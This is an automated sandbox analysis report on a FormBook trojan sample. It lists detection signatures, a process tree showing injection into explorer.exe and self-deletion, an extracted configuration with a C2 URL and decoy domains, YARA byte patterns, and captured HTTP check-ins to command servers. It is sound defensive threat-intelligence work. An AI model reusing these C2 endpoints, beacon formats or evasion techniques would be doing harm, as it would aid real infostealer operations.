Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report OApfyh3Vfm

Overview

General Information

Sample Name:OApfyh3Vfm (renamed file extension from none to exe)
Analysis ID:495803
MD5:015d157c73a9a51f0a3745a028d3abce
SHA1:594e74fe551ee2e3dcb7cef570792ee2e944b166
SHA256:4633bc441c059884886be83a8733f355d933b58db80f81c0a56404bceadf9667
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • OApfyh3Vfm.exe (PID: 6332 cmdline: 'C:\Users\user\Desktop\OApfyh3Vfm.exe' MD5: 015D157C73A9A51F0A3745A028D3ABCE)
    • OApfyh3Vfm.exe (PID: 2908 cmdline: C:\Users\user\Desktop\OApfyh3Vfm.exe MD5: 015D157C73A9A51F0A3745A028D3ABCE)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4812 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6880 cmdline: /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.anamentor.com/shjn/"], "decoy": ["trendlito.com", "myspoiledbytchcreations.com", "skinsotight.com", "merakii.art", "sakina.digital", "qumpan.com", "juxing666.com", "andrewolivercounselling.com", "blastaerobics.com", "linevshaper.store", "legendvacationrentals.com", "adna17.com", "ingodwetrustdaycare.com", "j98066.com", "noordinarybusiness.com", "pacelicensedelectrician.com", "istanbulmadencilik.com", "roboscop.com", "njhude.com", "eaglelures.com", "asmrfans.com", "wwv-kraken-apps.com", "agora.markets", "factechcolombia.com", "cadillacjacksbargrill.com", "lakearrowheadescape.com", "privatelymeeting.com", "purelol.com", "bailey-holzwerk.com", "lawsorlando.com", "zoonseo.com", "petscomfortgrooming.com", "blogreen.xyz", "modernmpm.com", "axe8.club", "majesticgolftours.com", "happyj.biz", "2ed58fwec.xyz", "moms4real.com", "craftsbylarissa.com", "ninetofivetheses.com", "giftsetswithlove.com", "artistryinahome.com", "bestofdubrovnik.info", "mediakal-sa.net", "9158cs.xyz", "sakuratyu.com", "christasconezntreats.com", "flex-aportelabels.com", "douyinliu.com", "meet-bait.com", "sumikkoremon.com", "jjscryptosignals.com", "repsychel.com", "hartfulcleaning.com", "buylandintexas.net", "xn--blogins-w1b.com", "aksene.com", "californialandscapeimages.com", "watchyellow.space", "altcultpromotions.com", "fusiongroupgames.net", "panchmitramultitrade.com", "theledgrowbook.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
      • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
      • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
      • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
      • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
      00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 24 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.OApfyh3Vfm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.OApfyh3Vfm.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.OApfyh3Vfm.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
          • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
          • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
          • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
          • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
          2.2.OApfyh3Vfm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.OApfyh3Vfm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.anamentor.com/shjn/"], "decoy": ["trendlito.com", "myspoiledbytchcreations.com", "skinsotight.com", "merakii.art", "sakina.digital", "qumpan.com", "juxing666.com", "andrewolivercounselling.com", "blastaerobics.com", "linevshaper.store", "legendvacationrentals.com", "adna17.com", "ingodwetrustdaycare.com", "j98066.com", "noordinarybusiness.com", "pacelicensedelectrician.com", "istanbulmadencilik.com", "roboscop.com", "njhude.com", "eaglelures.com", "asmrfans.com", "wwv-kraken-apps.com", "agora.markets", "factechcolombia.com", "cadillacjacksbargrill.com", "lakearrowheadescape.com", "privatelymeeting.com", "purelol.com", "bailey-holzwerk.com", "lawsorlando.com", "zoonseo.com", "petscomfortgrooming.com", "blogreen.xyz", "modernmpm.com", "axe8.club", "majesticgolftours.com", "happyj.biz", "2ed58fwec.xyz", "moms4real.com", "craftsbylarissa.com", "ninetofivetheses.com", "giftsetswithlove.com", "artistryinahome.com", "bestofdubrovnik.info", "mediakal-sa.net", "9158cs.xyz", "sakuratyu.com", "christasconezntreats.com", "flex-aportelabels.com", "douyinliu.com", "meet-bait.com", "sumikkoremon.com", "jjscryptosignals.com", "repsychel.com", "hartfulcleaning.com", "buylandintexas.net", "xn--blogins-w1b.com", "aksene.com", "californialandscapeimages.com", "watchyellow.space", "altcultpromotions.com", "fusiongroupgames.net", "panchmitramultitrade.com", "theledgrowbook.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: OApfyh3Vfm.exeVirustotal: Detection: 48%Perma Link
            Source: OApfyh3Vfm.exeMetadefender: Detection: 37%Perma Link
            Source: OApfyh3Vfm.exeReversingLabs: Detection: 71%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: OApfyh3Vfm.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: OApfyh3Vfm.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: netstat.pdb source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: OApfyh3Vfm.exe, 00000002.00000002.734139678.000000000131F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: OApfyh3Vfm.exe, NETSTAT.EXE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 4x nop then pop esi2_2_00415845
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 4x nop then pop ebx2_2_00406AB4
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 4x nop then pop esi2_2_00415760
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx8_2_02FD6AB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi8_2_02FE5845
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi8_2_02FE5760

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49815 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49815 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49815 -> 35.246.6.109:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49847 -> 173.231.37.12:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49847 -> 173.231.37.12:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49847 -> 173.231.37.12:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 199.59.242.153:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 199.59.242.153:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 199.59.242.153:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.sakina.digital
            Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.ninetofivetheses.com
            Source: C:\Windows\explorer.exeDomain query: www.privatelymeeting.com
            Source: C:\Windows\explorer.exeNetwork Connect: 156.225.2.209 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.agora.markets
            Source: C:\Windows\explorer.exeDomain query: www.sakuratyu.com
            Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.hartfulcleaning.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.2ed58fwec.xyz
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.74 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.qumpan.com
            Source: C:\Windows\explorer.exeDomain query: www.factechcolombia.com
            Uses netstat to query active network connections and open portsShow sources
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Performs DNS queries to domains with low reputationShow sources
            Source: C:\Windows\explorer.exeDNS query: www.2ed58fwec.xyz
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.anamentor.com/shjn/
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3 HTTP/1.1Host: www.hartfulcleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3 HTTP/1.1Host: www.qumpan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3 HTTP/1.1Host: www.2ed58fwec.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet3 HTTP/1.1Host: www.factechcolombia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet3 HTTP/1.1Host: www.sakina.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet3 HTTP/1.1Host: www.ninetofivetheses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3 HTTP/1.1Host: www.privatelymeeting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
            Source: global trafficHTTP traffic detected: HTTP/1.1 301 Moved PermanentlyDate: Sun, 03 Oct 2021 07:57:43 GMTContent-Length: 0Connection: closelocation: https://www.hartfulcleaning.com/shjn?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3strict-transport-security: max-age=120x-wix-request-id: 1633247863.819246588398126726Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVh8VTPOV0MzZjJizkRQ/qjD,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRaltZvo+9TobxsT5eVCdjGCQw1L1DUQeOVBnHJjDsALjW9C5pgEgJzARPPe1194hBnp6ONazVZfmanRIUStwnThmc=,2UNV7KOq4oGjA5+PKsX47DroW4/3ETklcOkoKiqVN25YgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,m7d0zj9X6FBqkyAIyh66vErLMFr5x66tSJCN7L0bVuJNG+KuK+VIZfbNzHJu0vJu,k4IrXgMmYJ2VF1cp9wAw77VG8YCN6gshiXCVhknPuz4D/Bm8UpHKg9klDMJbTqmHWIHlCalF7YnfvOr2cMPpyw==Cache-Control: no-cacheX-Content-Type-Options: nosniffServer: Pepyaka/1.19.10
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Oct 2021 07:56:54 GMTServer: Apache/2.4.10 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 71 75 6d 70 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.qumpan.com Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Oct 2021 07:58:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 6a 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shjn/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 03 Oct 2021 07:58:18 GMTServer: Apache/2.4.49 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 03 Oct 2021 07:58:23 GMTContent-Type: text/htmlContent-Length: 275ETag: "615764fb-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 301 Moved Permanentlyserver: nginxdate: Sun, 03 Oct 2021 07:58:29 GMTcontent-type: text/htmlcontent-length: 162location: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3x-iplb-request-id: 66818F39:C2B5_D5BA2105:0050_615962A5_2A4BC799:CEDDx-iplb-instance: 16976set-cookie: SERVERID77446=200172|YVliq|YVliq; path=/; HttpOnlycache-control: privateconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
            Source: NETSTAT.EXE, 00000008.00000002.933459913.0000000003B52000.00000004.00020000.sdmpString found in binary or memory: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko
            Source: unknownDNS traffic detected: queries for: www.agora.markets
            Source: global trafficHTTP traffic detected: GET /shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3 HTTP/1.1Host: www.hartfulcleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
